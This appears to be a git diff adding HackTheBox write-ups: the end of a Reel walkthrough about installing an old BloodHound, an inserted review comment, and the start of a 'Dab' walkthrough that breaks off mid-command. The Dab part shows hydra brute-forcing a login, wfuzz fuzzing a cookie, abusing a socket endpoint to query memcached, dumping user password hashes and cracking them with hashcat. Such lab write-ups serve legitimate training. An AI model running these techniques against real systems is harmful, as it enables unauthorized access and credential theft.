+ -rwxr-xr-x 1 nothing nothing 6322128 Jul 15 20:13 chrome-sandbox
+ -rw-r--r-- 1 nothing nothing 10505952 Jul 15 20:13 icudtl.dat
+ -rwxr-xr-x 1 nothing nothing 243992 Jul 15 20:13 libEGL.so
+ -rwxr-xr-x 1 nothing nothing 3103488 Jul 15 20:13 libffmpeg.so
+ -rwxr-xr-x 1 nothing nothing 8948976 Jul 15 20:13 libGLESv2.so
+ -rwxr-xr-x 1 nothing nothing 4488304 Jul 15 20:13 libvk_swiftshader.so
+ -rwxr-xr-x 1 nothing nothing 8483376 Jul 15 20:13 libvulkan.so
+ -rw-r--r-- 1 nothing nothing 1060 Jul 15 20:13 LICENSE
+ -rw-r--r-- 1 nothing nothing 4710103 Jul 15 20:13 LICENSES.chromium.html
+ drwxrwxr-x 2 nothing nothing 4096 Jul 15 20:13 locales
+ drwxrwxr-x 3 nothing nothing 4096 Jul 15 20:13 resources
+ -rw-r--r-- 1 nothing nothing 4835574 Jul 15 20:13 resources.pak
+ -rw-r--r-- 1 nothing nothing 50591 Jul 15 20:13 snapshot_blob.bin
+ drwxrwxr-x 2 nothing nothing 4096 Jul 15 20:13 swiftshader
+ -rw-r--r-- 1 nothing nothing 170904 Jul 15 20:13 v8_context_snapshot.bin
+ -rw-r--r-- 1 nothing nothing 5 Jul 15 20:13 version
+ -rw-r--r-- 1 nothing nothing 107 Jul 15 20:13 vk_swiftshader_icd.json
+
+ [ 10.10.16.9/23 ] [ /dev/pts/20 ] [Tools/Bloodhound/BloodHound-linux-x64]
+ → sudo ln -s $(pwd)/BloodHound /usr/local/bin/bloodhound
+ [sudo] password for nothing:
+
+
+
+`   
+
+Now this means that you need to install the bloodhound version that was available at the time when the box was released, so let's install the Bloodhound version from 2018:
+
+
+ [ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → which bloodhound
+ /usr/local/bin/bloodhound
+
+ [ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → rm /usr/local/bin/bloodhound
+ rm: cannot remove '/usr/local/bin/bloodhound': Permission denied
+
+ [ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → sudo !!
+
+ [ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → sudo rm /usr/local/bin/bloodhound
+ [sudo] password for nothing:
+
+ [ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/Tools]
+ → ls -lash
+ total 12K
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 27 21:19 .
+ 4.0K drwxr-xr-x 28 nothing nothing 4.0K Mar 27 12:49 ..
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 27 21:19 Bloodhound
+
+ [ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/Tools]
+ → rm -rf Bloodhound
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools]
+ → wget https://github.com/BloodHoundAD/BloodHound/releases/download/2.0.4/BloodHound-linux-x64.zip
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools]
+ → unzip BloodHound-linux-x64.zip
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools]
+ → cd BloodHound-linux-x64
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
+ → sudo ln -s $(pwd)/BloodHound /usr/local/bin/bloodhound
+ [sudo] password for nothing:
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
+ → which bloodhound
+ /usr/local/bin/bloodhound
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
+ → bloodhound
+ bloodhound: error while loading shared libraries: libgconf-2.so.4: cannot open shared object file: No such file or directory
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
+ → sudo apt install libgconf-2-4 -y
+ Reading package lists... Done
+
+ [ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
+ → bloodhound
+ Gtk-Message: 13:00:16.146: Failed to load module "gail"
+
+
+
+Then we repeat the previous steps and see the result after uploading the acls.csv file:
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
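Review bot: the switch to BloodHound 2.0.4 is justified only by the box's release date (`you need to install the bloodhound version that was available at the time when the box was released`), but the hunk never states what the current build actually did wrong with acls.csv; one sentence naming the incompatibility would turn this from a rule of thumb into a reproducible step. Two caveats belong next to `sudo ln -s $(pwd)/BloodHound /usr/local/bin/bloodhound`: the zip fetched from `github.com/BloodHoundAD/BloodHound/releases/download/2.0.4/` is unpacked and put on PATH with no checksum or signature check, and because the entry in `/usr/local/bin` is a symlink into `~/Tools/BloodHound-linux-x64`, anyone who can write to that user-owned directory controls what `bloodhound` executes from then on (copying the tree into a root-owned location, or simply running it from the unpacked directory, avoids that). `libgconf-2-4` is installed only to satisfy the old build's `libgconf-2.so.4` dependency, and the `Gtk-Message: 13:00:16.146: Failed to load module "gail"` that follows is a harmless warning rather than a failure; the text should say so, otherwise readers will keep debugging a working install. Finally, both `Then we repeat the previous steps and see the result after uploading the acls.csv file:` and `Here we can see the progress graph :` are followed by nothing but blank lines, so the screenshots those sentences introduce are missing from the file.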
diff --git a/Hard/12.md b/Hard/12.md
new file mode 100644
index 0000000..ead45c4
--- /dev/null
+++ b/Hard/12.md
@@ -0,0 +1,848 @@
+# Dab Writeup
+
+
+
+## Introduction :
+
+Dab is a hard linux box released back in August 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~/_HTB/dab]
+ → sudo nmap -vvv -sTU -p- 10.10.10.86 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 80/tcp on 10.10.10.86
+ Discovered open port 22/tcp on 10.10.10.86
+ Discovered open port 21/tcp on 10.10.10.86
+ Discovered open port 8080/tcp on 10.10.10.86
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~/_HTB/dab]
+ → sudo nmap -sCV -p80,21,22,8080 10.10.10.86
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 21:52 CET
+ Nmap scan report for 10.10.10.86
+ Host is up (0.036s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_-rw-r--r-- 1 0 0 8803 Mar 26 2018 dab.jpg
+ | ftp-syst:
+ | STAT:
+ | FTP server status:
+ | Connected to ::ffff:10.10.14.16
+ | Logged in as ftp
+ | TYPE: ASCII
+ | No session bandwidth limit
+ | Session timeout in seconds is 300
+ | Control connection is plain text
+ | Data connections will be plain text
+ | At session startup, client count was 3
+ | vsFTPd 3.0.3 - secure, fast, stable
+ |_End of status
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 20:05:77:1e:73:66:bb:1e:7d:46:0f:65:50:2c:f9:0e (RSA)
+ | 256 61:ae:15:23:fc:bc:bc:29:13:06:f2:10:e0:0e:da:a0 (ECDSA)
+ |_ 256 2d:35:96:4c:5e:dd:5c:c0:63:f0:dc:86:f1:b1:76:b5 (ED25519)
+ 80/tcp open http nginx 1.10.3 (Ubuntu)
+ |_http-server-header: nginx/1.10.3 (Ubuntu)
+ | http-title: Login
+ |_Requested resource was http://10.10.10.86/login
+ 8080/tcp open http nginx 1.10.3 (Ubuntu)
+ |_http-open-proxy: Proxy might be redirecting requests
+ |_http-server-header: nginx/1.10.3 (Ubuntu)
+ |_http-title: Internal Dev
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+We investigate using burpsuite's repeater:
+
+
+
+Here we investigate the error codes of our login attempts with a possible username (admin) and an improbable one (adminhaha):
+
+ 
+
+So we got the following results:
+
+
+ admin >>> Error: Login failed
+ adminhaha >>> Error: Login failed**.**
+
+
+
+This is something you need to check, do you get the same error message when trying different usernames? and here the error codes are different. which gives us a hint that admin is a username. Since we know that the trailing dot is indicative that we have a correct username, we're going to use hydra to enumerate that.
+
+
+
+
+ [DATA] attacking http-post-form://10.10.10.86:80/login:username=^USER^&password;=^PASS^&submit;=Login:Login failed.<
+ [80][http-post-form] host: 10.10.10.86 login: ADMIN password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: Admin password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: Audrey password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: DEFAULT password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: DEMO password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: Demo password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: admin password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: default password: hahhahhaha
+ [80][http-post-form] host: 10.10.10.86 login: demo password: hahhahhaha
+
+
+Now that we have a list of usernames:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/5 ] [~/_HTB/dab]
+ → cat usernames
+ ADMIN
+ Admin
+ Audrey
+ DEFAULT
+ DEMO
+ Demo
+ admin
+ default
+ demo
+
+
+
+we can try to find the password for one of these usernames using hydra and rockyou.txt
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → ls -lash /usr/share/wordlists/rockyou.txt
+ 134M -rw-r--r-- 1 root root 134M Jul 17 2019 /usr/share/wordlists/rockyou.txt
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → hydra -L usernames -P /usr/share/wordlists/rockyou.txt 10.10.10.86 http-post-form "/login:username=^USER^&password;=^PASS^&submit;=Login:failed"
+ Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
+
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-15 22:58:36
+ [DATA] max 16 tasks per 1 server, overall 16 tasks, 129099591 login tries (l:9/p:14344399), ~8068725 tries per task
+ [DATA] attacking http-post-form://10.10.10.86:80/login:username=^USER^&password;=^PASS^&submit;=Login:failed
+ [STATUS] 2643.00 tries/min, 2643 tries in 00:01h, 129096948 to do in 814:05h, 16 active
+ [80][http-post-form] host: 10.10.10.86 login: ADMIN password: Password1
+
+
+
+And it looks like we have credentials ! ADMIN:Password1 so let's login:
+
+
+
+It looks like an empty page with nothing useful on it, however it initiated something with memcache as we're going to see later on. To continue, we're going to take a look at port 8080:
+
+
+
+And here we get an error message telling us something about the pass auth cookie, so we need to figure out what the cookie is called. To do so we'll use wfuzz, when we run it without any filters we get the 322 character length:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/4 ] [/usr/share/wordlists]
+ → wfuzz -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "Cookie: FUZZ" http://10.10.10.86:8080
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.86:8080/
+ Total requests: 2588
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000003: 200 14 L 30 W 322 Ch "page"
+ 000000034: 200 14 L 30 W 322 Ch "login"
+ 000000036: 200 14 L 30 W 322 Ch "content"
+ 000000031: 200 14 L 30 W 322 Ch "s"
+ 000000033: 200 14 L 30 W 322 Ch "excerpt"
+ 000000007: 200 14 L 30 W 322 Ch "email"
+ 000000035: 200 14 L 30 W 322 Ch "search"
+ 000000015: 200 14 L 30 W 322 Ch "user"
+ 000000030: 200 14 L 30 W 322 Ch "description"
+ 000000001: 200 14 L 30 W 322 Ch "id"
+ 000000032: 200 14 L 30 W 322 Ch "post"
+ 000000029: 200 14 L 30 W 322 Ch "charset"
+ 000000023: 200 14 L 30 W 322 Ch "order"
+ 000000025: 200 14 L 30 W 322 Ch "p"
+ 000000026: 200 14 L 30 W 322 Ch "key"
+ 000000022: 200 14 L 30 W 322 Ch "mode"
+ 000000028: 200 14 L 30 W 322 Ch "start"
+ 000000024: 200 14 L 30 W 322 Ch "lang"
+ 000000027: 200 14 L 30 W 322 Ch "status"
+ 000000021: 200 14 L 30 W 322 Ch "data"
+ [...]
+
+
+So we're going to filter out the 322 character length using the --hh 322 flag:
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "Cookie: FUZZ" --hh 322 http://10.10.10.86:8080
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.86:8080/
+ Total requests: 2588
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000005: 200 14 L 29 W 324 Ch "password"
+
+ Total time: 11.62986
+ Processed Requests: 2588
+ Filtered Requests: 2587
+ Requests/sec.: 222.5305
+
+
+
+And we found it! the Cookie has to be set to the "password" value. So let's use burpsuite to make this process easier:
+
+  
+
+as expected, we get the cookie not set error, now let's set the cookie password parameter with a random value:
+
+
+
+And as you can see here, we get a different error message than previously, this means that the parameter "password" is valid, but the value that it posesses is not, so let's bruteforce it with a wordlist and as we do so, we need to first know what's the character response length:
+
+
+
+In this case it is 324 characters, so we need to use wfuzz's --hh 324 flag:
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → wfuzz -c -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -H "Cookie: password=FUZZ" --hh 324 http://10.10.10.86:8080
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.86:8080/
+ Total requests: 10000
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000097: 200 21 L 48 W 540 Ch "secret"
+
+ Total time: 43.05595
+ Processed Requests: 10000
+ Filtered Requests: 9999
+ Requests/sec.: 232.2559
+
+
+so when you set the cookie parameter 'password' to 'secret' you get the following:
+
+   
+
+and when you send random values to the prompts you get this url and response:
+
+
+ http://10.10.10.86:8080/socket?port=nothing&cmd;=nowhere
+
+
+
+` 
+
+Now we don't need to use firefox to manually bruteforce this, let's use curl.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=1&cmd;=nothing'
+
+ 500 Internal Server Error
+
+
+ # Internal Server Error
+
+
+
+
+ The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=21&cmd;=nothing' -s |tail +8
+
+
+
+
+
+
+
+ Status of cache engine: Online
+
+
+
+
+ #### TCP socket test
+
+
+
+
+
+
+
+
+
+
+ Output
+
+
+
+
+
+ 220 (vsFTPd 3.0.3)
+ 530 Please login with USER and PASS.
+
+
+
+%
+
+So here we see something interesting, we can scan the ports from that page. Let's trim out the useless infos from our output:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=21&cmd;=nothing' -s |tail +20 | head -n -4
+
+
+
+ 220 (vsFTPd 3.0.3)
+ 530 Please login with USER and PASS.
+
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=22&cmd;=nothing' -s |tail +20 | head -n -4
+
+
+ SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
+ Protocol mismatch.
+
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=80&cmd;=nothing' -s |tail +20 | head -n -4
+
+
+ HTTP/1.1 400 Bad Request
+ Server: nginx/1.10.3 (Ubuntu)
+ Date: Sat, 16 Jan 2021 09:18:49 GMT
+ Content-Type: text/html
+ Content-Length: 182
+ Connection: close
+
+
+
400 Bad Request
+
+ 400 Bad Request
+
nginx/1.10.3 (Ubuntu)
+
+
+
+
+
+So let's use wfuzz again to enumerate the ports:
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
+ → wfuzz -c -z range,1-65535 -u 'http://10.10.10.86:8080/socket?port=FUZZ&cmd;=nothing' -H "Cookie: password=secret" --hc=500
+ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://10.10.10.86:8080/socket?port=FUZZ&cmd;=nothing
+ Total requests: 65535
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000021: 200 28 L 61 W 627 Ch "21"
+ 000000022: 200 28 L 55 W 629 Ch "22"
+ 000000080: 200 40 L 84 W 1010 Ch "80"
+ 000008080: 200 40 L 84 W 1010 Ch "8080"
+ 000011211: 200 27 L 52 W 576 Ch "11211"
+ 000050528: 200 27 L 52 W 577 Ch "50528"
+
+
+
+looks like we picked up something our nmap scan didnt earlier:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=nothing' -s |tail +20 | head -n -4
+
+
+
+ ERROR
+
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=50528&cmd;=nothing' -s |tail +20 | head -n -4
+
+These error codes aren't helpful although we now know that these ports are most likely to be our next steps. So first we do a bit of research on port 11211 and we find that it may correspond to [memcached](https://memcached.org/)
+
+
+
+Based on this, we can enumerate memcached further:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=version' -s |tail +20 | head -n -4
+
+
+
+ VERSION 1.4.25 Ubuntu
+
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=stats slabs' -s |tail +20 | head -n -4
+
+
+ STAT 16:chunk_size 2904
+ STAT 16:chunks_per_page 361
+ STAT 16:total_pages 1
+ STAT 16:total_chunks 361
+ STAT 16:used_chunks 1
+ STAT 16:free_chunks 360
+ STAT 16:free_chunks_end 0
+ STAT 16:mem_requested 2880
+ STAT 16:get_hits 0
+ STAT 16:cmd_set 2
+ STAT 16:delete_hits 0
+ STAT 16:incr_hits 0
+ STAT 16:decr_hits 0
+ STAT 16:cas_hits 0
+ STAT 16:cas_badval 0
+ STAT 16:touch_hits 0
+ STAT 26:chunk_size 27120
+ STAT 26:chunks_per_page 38
+ STAT 26:total_pages 1
+ STAT 26:total_chunks 38
+ STAT 26:used_chunks 1
+ STAT 26:free_chunks 37
+ STAT 26:free_chunks_end 0
+ STAT 26:mem_requested 24699
+ STAT 26:get_hits 13640
+ STAT 26:cmd_set 29
+ STAT 26:delete_hits 0
+ STAT 26:incr_hits 0
+ STAT 26:decr_hits 0
+ STAT 26:cas_hits 0
+ STAT 26:cas_badval 0
+ STAT 26:touch_hits 0
+ STAT active_slabs 2
+ STAT total_malloced 2078904
+ END
+
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=stats items' -s |tail +20 | head -n -4
+
+
+ STAT items:16:number 1
+ STAT items:16:age 48401
+ STAT items:16:evicted 0
+ STAT items:16:evicted_nonzero 0
+ STAT items:16:evicted_time 0
+ STAT items:16:outofmemory 0
+ STAT items:16:tailrepairs 0
+ STAT items:16:reclaimed 0
+ STAT items:16:expired_unfetched 0
+ STAT items:16:evicted_unfetched 0
+ STAT items:16:crawler_reclaimed 0
+ STAT items:16:crawler_items_checked 0
+ STAT items:16:lrutail_reflocked 0
+ STAT items:26:number 1
+ STAT items:26:age 48410
+ STAT items:26:evicted 0
+ STAT items:26:evicted_nonzero 0
+ STAT items:26:evicted_time 0
+ STAT items:26:outofmemory 0
+ STAT items:26:tailrepairs 0
+ STAT items:26:reclaimed 0
+ STAT items:26:expired_unfetched 0
+ STAT items:26:evicted_unfetched 0
+ STAT items:26:crawler_reclaimed 0
+ STAT items:26:crawler_items_checked 0
+ STAT items:26:lrutail_reflocked 0
+ END
+
+
+
+So here we managed to get information on the OS, and the items and memory, which are known as slabs. You can see their ids are either 16 or 26, for each slab we can use **stats cachedump** to give us each item in the slab with its size and expiration timestamp:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=stats cachedump 16 0' -s |tail +20 | head -n -4
+
+
+
+ ITEM stock [2807 b; 1610748196 s]
+ END
+
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=stats cachedump 26 0' -s |tail +20 | head -n -4
+
+
+ ITEM users [24625 b; 1610748187 s]
+ END
+
+
+
+We can also get Users data:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=get users' -s |tail +20 | head -n -4
+
+
+
+ END
+
+
+
+Well, not quite, that is because we need to login like we did earlier:
+
+
+
+Once we logged in again, get the users info but format it correctly otherwise this is going to be some unreadable garbage:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=get users' -s |tail +20 | head -n -4
+
+
+
+ VALUE users 0 24625
+ {"quinton_dach": "17906b445a05dc42f78ae86a92a57bbd", "jackie.abbott": "c6ab361604c4691f78958d6289910d21", "isidro": "e4a4c90483d2ef61de42af1f044087f3", "roy": "afbde995441e19497fe0695e9c539266", "colleen": "d3792794c3143f7e04fd57dc8b085cd4", "harrison.hessel": "bc5f9b43a0336253ff947a4f8dbdb74f", "asa.christiansen": "d7505316e9a10fc113126f808663b5a4", "jessie": "71f08b45555acc5259bcefa3af63f4e1", "milton_hintz": "8f61be2ebfc66a5f2496bbf849c89b84", "demario_homenick": "2c22da161f085a9aba62b9bbedbd4ca7", "paris": "ef9b20082b7c234c91e165c947f10b71", "gardner_ward": "eb7ed0e8c112234ab1439726a4c50162", "daija.casper": "4d0ed472e5714e5cca8ea7272b15173a", "alanna.prohaska": "6980ba8ee392b3fa6a054226b7d8dd8f", "russell_borer": "cb10b94b5dbb5dfab049070a2abda16e", "domenica.kulas": "5cb322691472f05130416b05b22d4cdf", "davon.kuhic": "e301e431db395ab3fdc123ba8be93ff9", "alana": "41c85abbc7c64d93ca7bda5e2cfc46c2", "bryana": "4d0da0f96ecd0e8b655573cd67b8a1c1", "elmo_welch": "89122bf3ade23faf37b470f1fa5c7358", "sasha": "fbabdcc0eb2ace9aa5b88148a02f78fe", "krystina.lynch": "1b4b73070f563b787afaf435943fac9c", "rick_kirlin": "8952b9d5be0dcb77bdf349cc0e79b49d", "elenora": "edbe5879fa4e452ceceedccf59067409", "broderick": "
+ [...]
+
+
+[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd;=get users' -H "Cookie: password=secret" | recode html..ascii | sed -n '/VALUE/{:a;n;/END/b;p;ba}' | jq . { "quinton_dach": "17906b445a05dc42f78ae86a92a57bbd", "jackie.abbott": "c6ab361604c4691f78958d6289910d21", "isidro": "e4a4c90483d2ef61de42af1f044087f3", "roy": "afbde995441e19497fe0695e9c539266", "colleen": "d3792794c3143f7e04fd57dc8b085cd4", "harrison.hessel": "bc5f9b43a0336253ff947a4f8dbdb74f", "asa.christiansen": "d7505316e9a10fc113126f808663b5a4", "jessie": "71f08b45555acc5259bcefa3af63f4e1", "milton_hintz": "8f61be2ebfc66a5f2496bbf849c89b84", [...] }
+
+Thing is, you need to log back in to be able to keep reading the users data because after 1 minute the data gets cleared out of memcache. So we're going to save it to a file
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd;=get users' -H "Cookie: password=secret" | recode html..ascii | sed -n '/VALUE/{:a;n;/END/b;p;ba}' | jq . > users.txt
+
+
+
+Now here we need to get the hashes out of that json file:
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat users.json
+ {
+ "quinton_dach": "17906b445a05dc42f78ae86a92a57bbd",
+ "jackie.abbott": "c6ab361604c4691f78958d6289910d21",
+ "isidro": "e4a4c90483d2ef61de42af1f044087f3",
+ "roy": "afbde995441e19497fe0695e9c539266",
+ "colleen": "d3792794c3143f7e04fd57dc8b085cd4",
+ [...]
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat users.json | jq -r 'to_entries | .[].value' |head -n10
+ 17906b445a05dc42f78ae86a92a57bbd
+ c6ab361604c4691f78958d6289910d21
+ e4a4c90483d2ef61de42af1f044087f3
+ afbde995441e19497fe0695e9c539266
+ d3792794c3143f7e04fd57dc8b085cd4
+ bc5f9b43a0336253ff947a4f8dbdb74f
+ d7505316e9a10fc113126f808663b5a4
+ 71f08b45555acc5259bcefa3af63f4e1
+ 8f61be2ebfc66a5f2496bbf849c89b84
+ 2c22da161f085a9aba62b9bbedbd4ca7
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat users.json | jq -r 'to_entries | .[].value' > hashes
+
+
+
+Once we have the hashes saved into a file, we can use hashcat to crack them, and 12 of them returned:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → hashcat -a 0 -m 0 hashes /usr/share/wordlists/rockyou.txt --force -o cracked
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → hashcat users-hashes --show
+ eb95fc1ab8251cf1f8f870e7e4dae54d:megadeth
+ fc7992e8952a8ff5000cb7856d8586d2:Princess1
+ fe01ce2a7fbac8fafaed7c982a04e229:demo
+ 2ac9cb7dc02b3c0083eb70898e549b63:Password1
+ 254e5f2c3beb1a3d03f17253c15c07f3:hacktheplanet
+ c21f969b5f03d33d43e04f8f136e7682:default
+ 9731e89f01c1fb943cf0baa6772d2875:piggy
+ 0ef9c986fad340989647f0001e3555d4:misfits
+ 5177790ad6df0ea98db41b37b602367c:strength
+ 6f9ff93a26a118b460c878dc30e17130:monkeyman
+ 1e0ad2ec7e8c3cc595a9ec2e3762b117:blaster
+ 0daa6275280be3cf03f9f9c62f9d26d1:lovesucks1
+
+
+
+So now we have a massive list of users and 12 passwords with only the hashes in common:
+
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat users.json | head -n10
+ {
+ "quinton_dach": "17906b445a05dc42f78ae86a92a57bbd",
+ "jackie.abbott": "c6ab361604c4691f78958d6289910d21",
+ "isidro": "e4a4c90483d2ef61de42af1f044087f3",
+ "roy": "afbde995441e19497fe0695e9c539266",
+ "colleen": "d3792794c3143f7e04fd57dc8b085cd4",
+ "harrison.hessel": "bc5f9b43a0336253ff947a4f8dbdb74f",
+ "asa.christiansen": "d7505316e9a10fc113126f808663b5a4",
+ "jessie": "71f08b45555acc5259bcefa3af63f4e1",
+ "milton_hintz": "8f61be2ebfc66a5f2496bbf849c89b84",
+
+ [ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
+ → cat user-hashes
